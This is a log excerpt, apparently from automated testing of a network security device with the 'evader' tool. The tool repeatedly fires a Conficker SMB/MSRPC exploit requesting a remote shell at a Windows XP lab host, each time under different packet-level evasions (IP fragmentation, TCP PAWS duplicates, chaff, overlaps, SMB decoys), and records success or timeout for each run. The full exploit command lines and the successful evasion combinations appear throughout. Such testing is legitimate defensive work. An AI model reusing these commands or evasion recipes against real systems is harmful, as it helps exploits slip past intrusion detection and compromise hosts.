  4204. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62429 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=0NColTrOQC8 --evasion=[netbios_connect,end]ipv4_opt,"8","inc","random_alpha" --evasion=[msrpc_req,end]smb_fnameobf,"change_case" --evasion=[smb_opentree,end]tcp_paws,"25%","3","random_alpha" --verifydelay=1000 --payload=shell
  4205. Info: Using random seed 0NColTrOQC/
  4206. The following evasions are applied from stage netbios_connect to end:
  4207. - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  4208. The duplicate packet has random alphabetic bytes as payload
  4209. The following evasions are applied from stage smb_opentree to end:
  4210. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alpha bytes as payload
  4211. The following evasions are applied from stage msrpc_req to end:
  4212. - The SMB filename is obfuscated:
  4213. * Random characters case is changed
  4214.  
  4215. Info: NetBIOS connection 10.62.90.111:62429 -> 10.35.1.207:445
  4216. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4217. Info: Sending MSRPC request with exploit
  4218. Info: Shell found, attack succeeded
  4219. Info: Shell closed
  4220. 0: Success.
  4221. ..
  4222. 7263 runs averaging 1.93 runs / second ; progress: 3761/43200.......
  4223. 7270 runs averaging 1.93 runs / second ; progress: 3766/43200...............
  4224. 7285 runs averaging 1.93 runs / second ; progress: 3771/43200...2015-06-08 00:22:23 INFO
  4225. Success. (10.62.90.119):
  4226. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17911 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=7pze8/Sv444 --evasion=[smb_opentree,msrpc_req]smb_chaff,"8","write_flag","zero" --evasion=[smb_openpipe,end]smb_writeandxpad,"1","random_alphanum" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","162615983","shuffle" --verifydelay=1000 --payload=shell
  4227. Info: Using random seed 7pze8/Sv447
  4228. The following evasions are applied from stage smb_opentree to msrpc_req:
  4229. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 162615983> and has shuffled original payload
  4230. - Before every 8th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
  4231. The following evasions are applied from stage smb_openpipe to end:
  4232. - 1 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
  4233.  
  4234. Info: NetBIOS connection 10.62.90.119:17911 -> 10.35.1.207:445
  4235. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4236. Info: Sending MSRPC request with exploit
  4237. Info: Shell found, attack succeeded
  4238. Info: CommandShell::SendCommand() - Failed to send string
  4239. Info: Command shell connection reset.
  4240. Info: Shell closed
  4241. 0: Success.
  4242. .......
  4243. 7296 runs averaging 1.93 runs / second ; progress: 3776/43200.....
  4244. 7301 runs averaging 1.93 runs / second ; progress: 3781/43200Pid 24284 timed out - killed
  4245. 2015-06-08 00:22:32 INFO
  4246. Timed out (10.62.90.113):
  4247. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23611 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=5alRX97X2kI --evasion=[smb_openpipe,msrpc_bind]tcp_seg,"1" --evasion=[smb_connect,end]tcp_urgent,"5","random" --verifydelay=1000 --payload=shell
  4248. Info: Using random seed 5alRX97X2kL
  4249. The following evasions are applied from stage smb_connect to end:
  4250. - Add a random urgent data byte to every 5 TCP segment.
  4251. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  4252. - TCP packets are segmented to contain at most 1 bytes of payload.
  4253.  
  4254. Info: NetBIOS connection 10.62.90.113:23611 -> 10.35.1.207:445
  4255. Terminated
  4256. ......
  4257. 7308 runs averaging 1.93 runs / second ; progress: 3786/43200.......Pid 24401 timed out - killed
  4258. 2015-06-08 00:22:38 INFO
  4259. Timed out (10.62.90.117):
  4260. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15171 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=xVzzkXF3BXg --evasion=[start,end]tcp_chaff,"75%","outofwindow|longhdr","alphanumrandomized" --evasion=[smb_openpipe,end]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
  4261. Info: Using random seed xVzzkXF3BXj
  4262. - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  4263. * An out-of-window sequence number.
  4264. * TCP header longer than packet total size
  4265. * Duplicate packet has original payload with alphanumeric bytes randomized
  4266. The following evasions are applied from stage smb_openpipe to end:
  4267. - 25% probability to add a random alphaurgent data byte to a TCP segment.
  4268.  
  4269. Info: NetBIOS connection 10.62.90.117:15171 -> 10.35.1.207:445
  4270. Terminated
  4271. ......2015-06-08 00:22:41 INFO
  4272. Success. (10.62.90.117):
  4273. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28276 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=8Ve8ihD6S7w --evasion=[smb_opentree,msrpc_bind]tcp_overlap,"427","new","random_alpha" --evasion=[smb_openpipe,end]tcp_paws,"75%","238041912","alpharandomized" --verifydelay=1000 --payload=shell
  4274. Info: Using random seed 8Ve8ihD6S7z
  4275. The following evasions are applied from stage smb_opentree to msrpc_bind:
  4276. - TCP segments are set to overlap by 427 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
  4277. The following evasions are applied from stage smb_openpipe to end:
  4278. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 238041912> and has original payload with alphabetic bytes randomized
  4279.  
  4280. Info: NetBIOS connection 10.62.90.117:28276 -> 10.35.1.207:445
  4281. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4282. Info: Sending MSRPC request with exploit
  4283. Info: Shell found, attack succeeded
  4284. Info: Shell closed
  4285. 0: Success.
  4286.  
  4287. 7323 runs averaging 1.93 runs / second ; progress: 3791/43200.....................
  4288. 7344 runs averaging 1.93 runs / second ; progress: 3796/43200.......2015-06-08 00:22:49 INFO
  4289. Success. (10.62.90.119):
  4290. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13572 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=WCJX7PrlRFg --evasion=[netbios_connect,smb_openpipe]ipv4_opt,"21","inc","random_alphanum" --evasion=[smb_opentree,msrpc_bind]ipv4_opt,"13","inc","zero" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","4","shuffle" --verifydelay=1000 --payload=shell
  4291. Info: Using random seed WCJX7PrlRFh
  4292. The following evasions are applied from stage netbios_connect to smb_openpipe:
  4293. - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  4294. The duplicate packet has random alphanumeric bytes as payload
  4295. The following evasions are applied from stage smb_opentree to msrpc_bind:
  4296. - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  4297. The duplicate packet has NULL bytes for payload
  4298. The following evasions are applied from stage msrpc_bind to msrpc_req:
  4299. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has shuffled original payload
  4300.  
  4301. Info: NetBIOS connection 10.62.90.119:13572 -> 10.35.1.207:445
  4302. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4303. Info: Sending MSRPC request with exploit
  4304. Info: Shell found, attack succeeded
  4305. Info: Command shell connection reset.
  4306. Info: CommandShell::SendCommand() - Failed to send string
  4307. Info: Shell closed
  4308. 0: Success.
  4309. .......
  4310. 7359 runs averaging 1.94 runs / second ; progress: 3802/43200.Pid 24561 timed out - killed
  4311. 2015-06-08 00:22:53 INFO
  4312. Timed out (10.62.90.114):
  4313. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47020 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=4AYntnpSJsY --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"80" --evasion=[smb_openpipe,end]smb_decoytrees,"3","5","2047","random_msrpcreq" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
  4314. Info: Using random seed 4AYntnpSJsb
  4315. The following evasions are applied from stage smb_connect to msrpc_bind:
  4316. - 25% probability to add a zero urgent data byte to a TCP segment.
  4317. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  4318. - IPv4 fragments with at most 80 bytes per fragment
  4319. The following evasions are applied from stage smb_openpipe to end:
  4320. - Before normal SMB writes, 3 SMB trees are opened and 5 writes are performed to them. The write payload is 2047 bytes of MSRPC request-like data.
  4321.  
  4322. Info: NetBIOS connection 10.62.90.114:47020 -> 10.35.1.207:445
  4323. Terminated
  4324. ...2015-06-08 00:22:55 INFO
  4325. Success. (10.62.90.111):
  4326. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62759 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=RvuqRNAqohM --evasion=[msrpc_bind,end]tcp_chaff,"75%","nullchksum|outofwindow|shorthdr|longhdr","alphanumrandomized" --evasion=[msrpc_req,end]tcp_paws,"75%","268435455","shuffle" --verifydelay=1000 --payload=shell
  4327. Info: Using random seed RvuqRNAqohN
  4328. The following evasions are applied from stage msrpc_bind to end:
  4329. - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  4330. * NULL TCP checksum.
  4331. * An out-of-window sequence number.
  4332. * TCP header shorter than 20 bytes
  4333. * TCP header longer than packet total size
  4334. * Duplicate packet has original payload with alphanumeric bytes randomized
  4335. The following evasions are applied from stage msrpc_req to end:
  4336. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has shuffled original payload
  4337.  
  4338. Info: NetBIOS connection 10.62.90.111:62759 -> 10.35.1.207:445
  4339. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4340. Info: Sending MSRPC request with exploit
  4341. Info: Shell found, attack succeeded
  4342. Info: CommandShell::SendCommand() - Failed to send string
  4343. Info: Command shell connection reset.
  4344. Info: Shell closed
  4345. 0: Success.
  4346. .....
  4347. 7370 runs averaging 1.94 runs / second ; progress: 3807/43200......
  4348. 7376 runs averaging 1.94 runs / second ; progress: 3812/43200...........
  4349. 7387 runs averaging 1.94 runs / second ; progress: 3817/43200..................
  4350. 7405 runs averaging 1.94 runs / second ; progress: 3822/43200..............
  4351. 7419 runs averaging 1.94 runs / second ; progress: 3827/43200................
  4352. 7435 runs averaging 1.94 runs / second ; progress: 3832/43200......2015-06-08 00:23:25 INFO
  4353. Success. (10.62.90.116):
  4354. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13041 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=oSdy0TUrlxM --evasion=[smb_connect,smb_opentree]ipv4_frag,"480" --evasion=[smb_connect,msrpc_req]smb_decoytrees,"6","6","719","random_msrpcbind" --verifydelay=1000 --payload=shell
  4355. Info: Using random seed oSdy0TUrlxO
  4356. The following evasions are applied from stage smb_connect to smb_opentree:
  4357. - IPv4 fragments with at most 480 bytes per fragment
  4358. The following evasions are applied from stage smb_connect to msrpc_req:
  4359. - Before normal SMB writes, 6 SMB trees are opened and 6 writes are performed to them. The write payload is 719 bytes of MSRPC bind-like data.
  4360.  
  4361. Info: NetBIOS connection 10.62.90.116:13041 -> 10.35.1.207:445
  4362. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4363. Info: Sending MSRPC request with exploit
  4364. Info: Shell found, attack succeeded
  4365. Info: CommandShell::SendCommand() - Failed to send string
  4366. Info: Command shell connection reset.
  4367. Info: Shell closed
  4368. 0: Success.
  4369. .......
  4370. 7449 runs averaging 1.94 runs / second ; progress: 3837/43200............
  4371. 7461 runs averaging 1.94 runs / second ; progress: 3842/43200.
  4372. 7462 runs averaging 1.94 runs / second ; progress: 3847/43200.2015-06-08 00:23:37 INFO
  4373. Success. (10.62.90.113):
  4374. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25609 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=jDaePIJ6iso --evasion=[netbios_connect,msrpc_bind]ipv4_opt,"50%","inc","random_alphanum" --evasion=[smb_opentree,end]smb_chaff,"8","write_flag","alphanum" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","8","zero" --verifydelay=1000 --payload=shell
  4375. Info: Using random seed jDaePIJ6isq
  4376. The following evasions are applied from stage netbios_connect to msrpc_bind:
  4377. - 50% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
  4378. The duplicate packet has random alphanumeric bytes as payload
  4379. The following evasions are applied from stage smb_opentree to msrpc_req:
  4380. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 0x00 bytes as payload
  4381. The following evasions are applied from stage smb_opentree to end:
  4382. - Before every 8th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
  4383.  
  4384. Info: NetBIOS connection 10.62.90.113:25609 -> 10.35.1.207:445
  4385. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4386. Info: Sending MSRPC request with exploit
  4387. Info: Shell found, attack succeeded
  4388. Info: Shell closed
  4389. 0: Success.
  4390. .....
  4391. 7469 runs averaging 1.94 runs / second ; progress: 3852/43200....
  4392. 7473 runs averaging 1.94 runs / second ; progress: 3857/43200......
  4393. 7479 runs averaging 1.94 runs / second ; progress: 3862/43200.................
  4394. 7496 runs averaging 1.94 runs / second ; progress: 3867/43200...................
  4395. 7515 runs averaging 1.94 runs / second ; progress: 3872/43200...........
  4396. 7526 runs averaging 1.94 runs / second ; progress: 3877/43200....
  4397. 7530 runs averaging 1.94 runs / second ; progress: 3882/43200..2015-06-08 00:24:17 INFO
  4398. Success. (10.62.90.113):
  4399. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20015 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=dQUimTokmKg --evasion=[netbios_connect,smb_opentree]tcp_paws,"75%","7","alpharandomized" --evasion=[smb_connect,msrpc_req]tcp_paws,"1","10","alpharandomized" --verifydelay=1000 --payload=shell
  4400. Info: Using random seed dQUimTokmKh
  4401. The following evasions are applied from stage netbios_connect to smb_opentree:
  4402. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphabetic bytes randomized
  4403. The following evasions are applied from stage smb_connect to msrpc_req:
  4404. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has original payload with alphabetic bytes randomized
  4405.  
  4406. Info: NetBIOS connection 10.62.90.113:20015 -> 10.35.1.207:445
  4407. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4408. Info: Sending MSRPC request with exploit
  4409. Info: Shell found, attack succeeded
  4410. Info: Shell closed
  4411. 0: Success.
  4412.  
  4413. 7533 runs averaging 1.94 runs / second ; progress: 3887/43200..2015-06-08 00:24:19 INFO
  4414. Success. (10.62.90.113):
  4415. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24870 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=LEWXIa/Bd2k --evasion=[start,msrpc_bind]ipv4_frag,"56" --evasion=[start,netbios_connect]ipv4_order,"firstlast" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","8","shuffle30" --verifydelay=1000 --payload=shell
  4416. Info: Using random seed LEWXIa/Bd2k
  4417. The following evasions are applied from stage start to msrpc_bind:
  4418. - IPv4 fragments with at most 56 bytes per fragment
  4419. The following evasions are applied from stage start to netbios_connect:
  4420. - IPv4 fragments are sent in correct order except that the first fragment comes last
  4421. The following evasions are applied from stage msrpc_bind to msrpc_req:
  4422. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 30 bytes of original payload, then shuffled original payload
  4423.  
  4424. Info: NetBIOS connection 10.62.90.113:24870 -> 10.35.1.207:445
  4425. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4426. Info: Sending MSRPC request with exploit
  4427. Info: Shell found, attack succeeded
  4428. Info: CommandShell::SendCommand() - Failed to send string
  4429. Info: Command shell connection reset.
  4430. Info: Shell closed
  4431. 0: Success.
  4432. ....
  4433. 7540 runs averaging 1.94 runs / second ; progress: 3892/43200.........
  4434. 7549 runs averaging 1.94 runs / second ; progress: 3897/43200..........
  4435. 7559 runs averaging 1.94 runs / second ; progress: 3902/43200..Pid 25915 timed out - killed
  4436. 2015-06-08 00:24:34 INFO
  4437. Timed out (10.62.90.115):
  4438. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31672 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=R7NIX+Io+yg --evasion=[start,smb_openpipe]ipv4_frag,"48" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
  4439. Info: Using random seed R7NIX+Io+yh
  4440. The following evasions are applied from stage start to smb_openpipe:
  4441. - IPv4 fragments with at most 48 bytes per fragment
  4442. The following evasions are applied from stage smb_openpipe to msrpc_req:
  4443. - Add a random alphanumeric urgent data byte to every 1 TCP segment.
  4444.  
  4445. Info: NetBIOS connection 10.62.90.115:31672 -> 10.35.1.207:445
  4446. Terminated
  4447. .........
  4448. 7571 runs averaging 1.94 runs / second ; progress: 3907/43200........Pid 26040 timed out - killed
  4449. 2015-06-08 00:24:39 INFO
  4450. Timed out (10.62.90.110):
  4451. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42437 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=5+99742Gcsk --evasion=[smb_opentree,end]tcp_paws,"5","6","shuffle30" --evasion=[netbios_connect,smb_connect]tcp_seg,"10" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
  4452. Info: Using random seed 5+99742Gcsn
  4453. The following evasions are applied from stage netbios_connect to smb_connect:
  4454. - TCP packets are segmented to contain at most 10 bytes of payload.
  4455. The following evasions are applied from stage smb_opentree to end:
  4456. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 30 bytes of original payload, then shuffled original payload
  4457. The following evasions are applied from stage smb_openpipe to msrpc_req:
  4458. - 25% probability to add a zero urgent data byte to a TCP segment.
  4459.  
  4460. Info: NetBIOS connection 10.62.90.110:42437 -> 10.35.1.207:445
  4461. Terminated
  4462. ............
  4463. 7592 runs averaging 1.94 runs / second ; progress: 3912/43200......2015-06-08 00:24:45 INFO
  4464. Success. (10.62.90.117):
  4465. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62963 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=rk+a46qwtk4 --evasion=[msrpc_bind,msrpc_req]msrpc_ndrflag,"char_ebcdic","float_ibm","byte3_nonzero","byte4_nonzero" --evasion=[smb_connect,end]tcp_paws,"25%","119368059","random" --verifydelay=1000 --payload=shell
  4466. Info: Using random seed rk+a46qwtk6
  4467. The following evasions are applied from stage smb_connect to end:
  4468. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 119368059> and has random bytes as payload
  4469. The following evasions are applied from stage msrpc_bind to msrpc_req:
  4470. - MSRPC NDR flag is modified:
  4471. * EBCDIC character encoding
  4472. * IBM floating point value encoding
  4473. * Reserved 3rd byte is set to a random non-zero value
  4474. * Reserved 4th byte is set to a random non-zero value
  4475.  
  4476.  
  4477. Info: NetBIOS connection 10.62.90.117:62963 -> 10.35.1.207:445
  4478. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4479. Info: Sending MSRPC request with exploit
  4480. Info: Shell found, attack succeeded
  4481. Info: Shell closed
  4482. 0: Success.
  4483. .
  4484. 7600 runs averaging 1.94 runs / second ; progress: 3917/43200......
  4485. 7606 runs averaging 1.94 runs / second ; progress: 3922/43200........
  4486. 7614 runs averaging 1.94 runs / second ; progress: 3927/43200.............
  4487. 7627 runs averaging 1.94 runs / second ; progress: 3932/43200...........
  4488. 7638 runs averaging 1.94 runs / second ; progress: 3937/43200............
  4489. 7650 runs averaging 1.94 runs / second ; progress: 3942/43200...........
  4490. 7661 runs averaging 1.94 runs / second ; progress: 3947/43200........
  4491. 7669 runs averaging 1.94 runs / second ; progress: 3952/43200..
  4492. 7671 runs averaging 1.94 runs / second ; progress: 3957/43200.........
  4493. 7680 runs averaging 1.94 runs / second ; progress: 3962/43200................
  4494. 7696 runs averaging 1.94 runs / second ; progress: 3967/43200..........2015-06-08 00:25:40 INFO
  4495. Success. (10.62.90.115):
  4496. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59021 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=Z0Kg5SOkUyY --evasion=[smb_connect,end]ipv4_frag,"48" --evasion=[smb_opentree,end]tcp_paws,"5","98447718","random_alphanum" --verifydelay=1000 --payload=shell
  4497. Info: Using random seed Z0Kg5SOkUyZ
  4498. The following evasions are applied from stage smb_connect to end:
  4499. - IPv4 fragments with at most 48 bytes per fragment
  4500. The following evasions are applied from stage smb_opentree to end:
  4501. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 98447718> and has random alphanumeric bytes as payload
  4502.  
  4503. Info: NetBIOS connection 10.62.90.115:59021 -> 10.35.1.207:445
  4504. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4505. Info: Sending MSRPC request with exploit
  4506. Info: Shell found, attack succeeded
  4507. Info: CommandShell::SendCommand() - Failed to send string
  4508. Info: Command shell connection reset.
  4509. Info: Shell closed
  4510. 0: Success.
  4511. ...
  4512. 7710 runs averaging 1.94 runs / second ; progress: 3972/43200
  4513. 7710 runs averaging 1.94 runs / second ; progress: 3977/43200Pid 27451 timed out - killed
  4514. 2015-06-08 00:25:50 INFO
  4515. Timed out (10.62.90.112):
  4516. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31480 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=XOBw9+XbinQ --evasion=[smb_connect,end]netbios_chaff,"3","empty_unspec|small_unspec|http_get|msrpc_req|broken_length" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","zero" --verifydelay=1000 --payload=shell
  4517. Info: Using random seed XOBw9+XbinR
  4518. The following evasions are applied from stage smb_connect to end:
  4519. - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  4520. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  4521. - 75% probability to add a zero urgent data byte to a TCP segment.
  4522.  
  4523. Info: NetBIOS connection 10.62.90.112:31480 -> 10.35.1.207:445
  4524. Terminated
  4525. .
  4526. 7712 runs averaging 1.94 runs / second ; progress: 3982/43200.........
  4527. 7721 runs averaging 1.94 runs / second ; progress: 3988/43200..........
  4528. 7731 runs averaging 1.94 runs / second ; progress: 3993/43200.....
  4529. 7736 runs averaging 1.94 runs / second ; progress: 3998/43200............
  4530. 7748 runs averaging 1.94 runs / second ; progress: 4003/43200....................
  4531. 7768 runs averaging 1.94 runs / second ; progress: 4008/43200.............
  4532. 7781 runs averaging 1.94 runs / second ; progress: 4013/43200.......
  4533. 7788 runs averaging 1.94 runs / second ; progress: 4018/43200..........
  4534. 7798 runs averaging 1.94 runs / second ; progress: 4023/43200...................2015-06-08 00:26:37 INFO
  4535. Success. (10.62.90.117):
  4536. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35633 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=uj13gaG/tWg --evasion=[start,msrpc_bind]tcp_paws,"21","10082354","shuffle" --evasion=[start,end]tcp_paws,"25%","268435455","shuffle30" --verifydelay=1000 --payload=shell
  4537. Info: Using random seed uj13gaG/tWi
  4538. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 30 bytes of original payload, then shuffled original payload
  4539. The following evasions are applied from stage start to msrpc_bind:
  4540. - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10082354> and has shuffled original payload
  4541.  
  4542. Info: NetBIOS connection 10.62.90.117:35633 -> 10.35.1.207:445
  4543. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4544. Info: Sending MSRPC request with exploit
  4545. Info: Shell found, attack succeeded
  4546. Info: Shell closed
  4547. 0: Success.
  4548. ..
  4549. 7820 runs averaging 1.94 runs / second ; progress: 4028/43200....2015-06-08 00:26:39 INFO
  4550. Success. (10.62.90.112):
  4551. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59405 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=kJsTKME6sVk --evasion=[netbios_connect,smb_opentree]tcp_overlap,"1479","new","random_alphanum" --evasion=[smb_connect,msrpc_req]tcp_paws,"25%","7","alphanumrandomized" --evasion=[smb_connect,end]tcp_paws,"50%","268435453","alphanumrandomized" --verifydelay=1000 --payload=shell
  4552. Info: Using random seed kJsTKME6sVm
  4553. The following evasions are applied from stage netbios_connect to smb_opentree:
  4554. - TCP segments are set to overlap by 1479 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  4555. The following evasions are applied from stage smb_connect to msrpc_req:
  4556. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphanumeric bytes randomized
  4557. The following evasions are applied from stage smb_connect to end:
  4558. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphanumeric bytes randomized
  4559.  
  4560. Info: NetBIOS connection 10.62.90.112:59405 -> 10.35.1.207:445
  4561. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4562. Info: Sending MSRPC request with exploit
  4563. Info: Shell found, attack succeeded
  4564. Info: Shell closed
  4565. 0: Success.
  4566. ......
  4567. 7831 runs averaging 1.94 runs / second ; progress: 4033/432002015-06-08 00:26:43 INFO
  4568. Success. (10.62.90.119):
  4569. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18078 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=de5xLhxtOOU --evasion=[smb_openpipe,end]smb_decoytrees,"4","3","1","random_msrpcbind" --evasion=[msrpc_bind,end]smb_seg,"7" --verifydelay=1000 --payload=shell
  4570. Info: Using random seed de5xLhxtOOV
  4571. The following evasions are applied from stage smb_openpipe to end:
  4572. - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 1 bytes of MSRPC bind-like data.
  4573. The following evasions are applied from stage msrpc_bind to end:
  4574. - SMB writes are segmented to contain at most 7 bytes of payload.
  4575.  
  4576. Info: NetBIOS connection 10.62.90.119:18078 -> 10.35.1.207:445
